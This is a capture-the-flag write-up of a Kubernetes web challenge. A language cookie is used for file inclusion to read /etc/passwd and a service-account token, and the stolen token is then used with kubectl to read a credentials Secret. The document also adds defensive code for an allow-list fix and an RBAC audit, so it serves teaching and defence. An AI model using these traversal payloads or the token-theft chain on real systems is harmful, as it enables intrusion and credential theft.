Barbhack 2021 — Web Write-up: Barbekube


Introduction

Challenge statement
Home page of the website hosted at http://barbekube.brb
  • a login page
  • the ability to change the language via a cookie
nmap barbekube.brb -sV -p 6443

LFI via the language-selection cookie

../../../../../etc/passwd
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
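
Why a language cookie used as a path reaches these files, next to an allow-list fix, as an added example that is not code from the challenge. The directory, the file naming and the list of languages are assumptions, since the write-up does not show the frontend's source.

```python
import posixpath

LANG_DIR = "/var/www/lang"   # assumed directory holding the translation files
ALLOWED = {"fr", "en"}       # assumed list of supported languages

def resolve_naive(cookie):
    """Vulnerable pattern: the cookie value is used as a path component."""
    return posixpath.normpath(posixpath.join(LANG_DIR, cookie))

def escapes_lang_dir(path):
    """True when a resolved path lies outside LANG_DIR."""
    return posixpath.commonpath([LANG_DIR, path]) != LANG_DIR

def resolve_hardened(cookie, default="fr"):
    """The cookie only selects a key from a fixed set; it is never a path."""
    lang = cookie if cookie in ALLOWED else default
    return posixpath.join(LANG_DIR, lang + ".json")

# Cookie values: one legitimate, two taken from the write-up.
SAMPLES = [
    "en",
    "../../../../../etc/passwd",
    "/run/secrets/kubernetes.io/serviceaccount/token",
]

def compare(samples=SAMPLES):
    """Return (cookie, naive path, escaped?, hardened path) for each sample."""
    rows = []
    for cookie in samples:
        naive = resolve_naive(cookie)
        rows.append((cookie, naive, escapes_lang_dir(naive), resolve_hardened(cookie)))
    return rows

if __name__ == "__main__":
    for row in compare():
        print(row)
```

An absolute cookie value needs no `../` at all, because joining a base directory with an absolute path discards the base; a filter that only strips `../` sequences would therefore still expose the service-account token.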

Accessing the cluster API with kubectl

apiVersion: v1
kind: Config
clusters:
- name: default-cluster
  cluster:
    certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUM1ekNDQWMrZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeE1EZ3lPREl5TlRRek1sb1hEVE14TURneU5qSXlOVFF6TWxvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTGZUCkl3SXpacFJhTlI5S1hSQkJRY0NITFhTdCtPU1oyUWtXZXN4TnhXL1lyM1RRZ3k0RTZxY2lNY1A3ZW5qZjRWcWoKbzhabngvS0hBUTZXY25xZ21kTGFjdU5ZV3Avb3k3RUlvQUp5SlpwWExERytFSFFtVXRsVE9sU1FYZmt5UWpqNgpadnRSc211VDV2VlNkZ213eHU3TEppNW1tRzFkTHI4UFpJMU5nbTQzOFg2bmJxR0VIdS9OTEFuVEh4aGpPMnNnCmU0bm5GMXJOMUVWVGFWL2dZVFlpVDlIVCs1Y0Z6cnZZTXhTUmJQVURTWDZ0d3FlS0V6RzY5QTg2VFp1TlJ1ZmcKNFlRUHhISzdjT091S1pycUFHOWlMeVZjZHZsc3RHZjRCTVBIamM4N3VBMENoY0dteTRXV2w3T29naWg3c2JuRgpLVTE5UW5ObHVVWmhRUGEvUlNFQ0F3RUFBYU5DTUVBd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZOR0xSUEM1eDByU0ExL1kzRDRYZzBHUVRJUDFNQTBHQ1NxR1NJYjMKRFFFQkN3VUFBNElCQVFCNStlTzJEUW1iWFVsaXpSaDloY0F5cWowOG9iK2NsdmdBOVVRczJWbWhQdXRmZDR1UApiV2lOUTVKQXZUWHdYL0FrU0dwWlJxYmt0aFpsVmUrVjY3cHQ3TmdEaXFCR0FWa2VMMnF2TVdoaG4rVUNzZG85Cjd5MkppdFpCcjFvNC84NExVdjQwKy9aaDNWQ2ZFQnQwMG9HcUxrMGtlNFoyc1FRVHNUWGwyMnd3QXBiSE9LL0gKUS9mVnhib0Z3WjNyYTdwMUp5UndhVHl3YS9PVE44NEVXdFJVSzRSbnlKMW55c0FwR285Szg3SnN4KzVZckM2cQo0aUNqZUs0TVZocFlIWEZiRHloZUVWdmJEcEhDSERnUDFKYU9yc05lb2tFNVlLekJ0MUNpd3NKZ0Q1dUhHaXZzCmdHY0QwM0RXYW54NDVDK3dGZlI1MktBbGsrYlhnNTJ4enJjagotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0t
    server: https://kubernetes.default.svc:6443
contexts:
- name: default-context
  context:
    cluster: default-cluster
    namespace: the-barbekube
    user: default-user
current-context: default-context
users:
- name: default-user
  user:
    token: eyJhbGciOiJSUzI1NiIsImtpZCI6ImhHX3ZYNEdFaWFtX1BWRUpvYzljOUdsX09oS1UwekJlSTVNaVpCZEpoYWcifQ.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.RGmxp_KgZeoej0vtAuKLQCXpOeUoYvjzzclUi4ASGYh1-0zQovYs9hWKvVxfWHBuRVkwzilm-sZWB5GqDYgxFNQzkUCFDPw2tUSPon2tc8yUC5E1b-_H8trv6ejmOXh1_c2gEpgcopNe3sgDStvuHQZz5cWH9bUlWmIXaLcWspB6KwQxlb8iSIc_-X3oQfJABHnv5A3cuSpNHXJdMwiQ8GFeoQm12_xKkmR7QpbvX-K65JRIfNEsordIY2N4f6BHb_kxir8MYqo-CpWDiuHI8u067i7A6VwtO0IxuzBGZrBbr7B0Ht0oS-3h3qUnTavOKKCxVCzpy0zG2vuoOgNGmA

10.10.42.205 kubernetes.default.svc

kubectl --insecure-skip-tls-verify --kubeconfig ./config get pods
NAME                        READY   STATUS    RESTARTS   AGE
frontend-5d6fc7449d-86bfn   1/1     Running   0          102m
login-76cf467fdc-z7s7r      1/1     Running   0          102m

kubectl --insecure-skip-tls-verify --kubeconfig ./config auth can-i --list
Resources      Non-Resource URLs    Resource Names   Verbs
...
pods.*         []                   []               [get list]
secrets.*      []                   []               [get]
...

kubectl --insecure-skip-tls-verify --kubeconfig ./config describe pods login-76cf467fdc-z7s7r
Name:         login-76cf467fdc-z7s7r
Namespace:    the-barbekube
Priority:     0
Node:         ctf-kube-challs-control-plane/172.18.0.2
Start Time:   Sun, 29 Aug 2021 00:58:34 +0200
Labels:       app=login
              pod-template-hash=76cf467fdc
Annotations:  <none>
Status:       Running
IP:           10.244.0.10
IPs:
  IP:           10.244.0.10
Controlled By:  ReplicaSet/login-76cf467fdc
Containers:
  login:
    Container ID:   containerd://b57c98d05fe8bbc729b64a7c298e436d2f52af6fd3a266523b3a4d2de4cb4dc0
    Image:          docker.io/barbekube/flag:v1
    Image ID:       sha256:963f6f7dd43e98a840d27309f979444c7595ceb0562ed3f51326a6d85e0d8567
    Port:           8080/TCP
    Host Port:      0/TCP
    State:          Running
      Started:      Sun, 29 Aug 2021 00:58:35 +0200
    Ready:          True
    Restart Count:  0
    Limits:
      cpu:     200m
      memory:  128Mi
    Requests:
      cpu:        200m
      memory:     128Mi
    Liveness:     http-get http://:http/healthz delay=0s timeout=1s period=10s #success=1 #failure=3
    Readiness:    http-get http://:http/healthz delay=0s timeout=1s period=10s #success=1 #failure=3
    Environment:  <none>
    Mounts:
      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-6fqdj (ro)
Conditions:
  Type              Status
  Initialized       True
  Ready             True
  ContainersReady   True
  PodScheduled      True
Volumes:
  kube-api-access-6fqdj:
    Type:                    Projected (a volume that contains injected data from multiple sources)
    TokenExpirationSeconds:  3607
    ConfigMapName:           kube-root-ca.crt
    ConfigMapOptional:       <nil>
    DownwardAPI:             true
QoS Class:                   Guaranteed
Node-Selectors:              <none>
Tolerations:                 node.kubernetes.io/not-ready:NoExecute op=Exists for 300s
                             node.kubernetes.io/unreachable:NoExecute op=Exists for 300s
Events:                      <none>

kubectl --insecure-skip-tls-verify --kubeconfig ./config describe pods frontend-5d6fc7449d-86bfn
Name:         frontend-5d6fc7449d-86bfn
Namespace:    the-barbekube
Priority:     0
Node:         ctf-kube-challs-control-plane/172.18.0.2
Start Time:   Sun, 29 Aug 2021 00:58:34 +0200
Labels:       app=frontend
              pod-template-hash=5d6fc7449d
Annotations:  <none>
Status:       Running
IP:           10.244.0.11
IPs:
  IP:           10.244.0.11
Controlled By:  ReplicaSet/frontend-5d6fc7449d
Containers:
  frontend:
    Container ID:   containerd://773f9598c71504be9c35690b20f67532d8ca3655b394ea7a0ca2c63fa4cd5443
    Image:          the-barbekube-frontend:latest
    Image ID:       sha256:7f534e0b54bfc1633bf948d871c219550c769dbb3fba083aded2560d5b39d4b3
    Port:           80/TCP
    Host Port:      0/TCP
    State:          Running
      Started:      Sun, 29 Aug 2021 00:58:36 +0200
    Ready:          True
    Restart Count:  0
    Limits:
      cpu:     200m
      memory:  128Mi
    Requests:
      cpu:        200m
      memory:     128Mi
    Liveness:     http-get http://:http/ delay=0s timeout=1s period=10s #success=1 #failure=3
    Readiness:    http-get http://:http/ delay=0s timeout=1s period=10s #success=1 #failure=3
    Environment:  <none>
    Mounts:
      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-qnwcp (ro)
Conditions:
  Type              Status
  Initialized       True
  Ready             True
  ContainersReady   True
  PodScheduled      True
Volumes:
  kube-api-access-qnwcp:
    Type:                    Projected (a volume that contains injected data from multiple sources)
    TokenExpirationSeconds:  3607
    ConfigMapName:           kube-root-ca.crt
    ConfigMapOptional:       <nil>
    DownwardAPI:             true
QoS Class:                   Guaranteed
Node-Selectors:              <none>
Tolerations:                 node.kubernetes.io/not-ready:NoExecute op=Exists for 300s
                             node.kubernetes.io/unreachable:NoExecute op=Exists for 300s
Events:                      <none>
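
A defender-side check for what these outputs show together (the internet-facing pod mounts a token that is allowed to read Secrets), added here and not part of the challenge. The rules mirror the `auth can-i --list` output above; the role, binding and service-account names are hypothetical, and both pods are assumed to run under the `default` service account.

```python
READ_VERBS = {"get", "list", "watch", "*"}

def secret_read_rules(rules):
    """Return (verbs, unrestricted) for every rule that allows reading Secrets."""
    hits = []
    for rule in rules:
        verbs = set(rule.get("verbs", [])) & READ_VERBS
        if verbs and set(rule.get("resources", [])) & {"secrets", "*"}:
            hits.append((sorted(verbs), not rule.get("resourceNames")))
    return hits

def audit(pods, bindings, roles):
    """List pods whose mounted service-account token can read Secrets."""
    findings = []
    for pod in pods:
        if pod.get("automountServiceAccountToken") is False:
            continue  # no token on disk, nothing for a file read to leak
        sa = pod.get("serviceAccountName", "default")
        for role in bindings.get(sa, []):
            for _verbs, unrestricted in secret_read_rules(roles[role]):
                findings.append((pod["name"], sa, role, unrestricted))
    return findings

# Constructed data; role and account names are hypothetical.
ROLES = {
    "app-role": [{"resources": ["pods"], "verbs": ["get", "list"]},
                 {"resources": ["secrets"], "verbs": ["get"]}],
    "login-role": [{"resources": ["secrets"], "verbs": ["get"],
                    "resourceNames": ["login-credentials"]}],
}
AS_DEPLOYED = {
    "pods": [{"name": "frontend"}, {"name": "login"}],
    "bindings": {"default": ["app-role"]},
}
HARDENED = {
    "pods": [{"name": "frontend", "automountServiceAccountToken": False},
             {"name": "login", "serviceAccountName": "login"}],
    "bindings": {"login": ["login-role"]},
}

if __name__ == "__main__":
    for label, cfg in (("as deployed", AS_DEPLOYED), ("hardened", HARDENED)):
        print(label, audit(cfg["pods"], cfg["bindings"], ROLES))
```

In the hardened layout only the login pod keeps a token, and its rule is pinned to the single Secret it reads, so a file read in the frontend no longer yields cluster credentials.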
Image:          the-barbekube-frontend:latest
Image:          docker.io/barbekube/flag:v1
docker pull docker.io/barbekube/flag:v1

Analysis of the public Docker image

docker run -it --entrypoint /bin/sh docker.io/barbekube/flag:v1
/app # ls
Dockerfile __pycache__ kube.py main.py requirements.txt
/app # cat kube.py
from kubernetes import client, config

def getSecret():
    # config.load_kube_config()
    config.load_incluster_config()
    v1 = client.CoreV1Api()
    current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()
    secret = v1.read_namespaced_secret("login-credentials", current_namespace)

    return secret

kubectl --insecure-skip-tls-verify --kubeconfig ./config get secrets login-credentials -o yaml
apiVersion: v1
data:
  password: YnJie3AzNzE3My0zbjdyM2MwNzMtNHUtYjRyYjNrdWIzfQ==
  username: YWRtaW4=
kind: Secret
metadata:
  annotations:
    kubectl.kubernetes.io/last-applied-configuration: |
      {"apiVersion":"v1","data":{"password":"YnJie3AzNzE3My0zbjdyM2MwNzMtNHUtYjRyYjNrdWIzfQ==","username":"YWRtaW4="},"kind":"Secret","metadata":{"annotations":{},"name":"login-credentials","namespace":"the-barbekube"},"type":"Opaque"}
  creationTimestamp: "2021-08-28T22:58:34Z"
  name: login-credentials
  namespace: the-barbekube
  resourceVersion: "1167"
  uid: dadccd2e-bfa0-4c55-8ec4-243f75d67893
type: Opaque

{"password":"brb{p37173-3n7r3c073-4u-b4rb3kub3}","username":"admin"}
Challenge flag obtained after logging in with the credentials from the secret

French CTF team
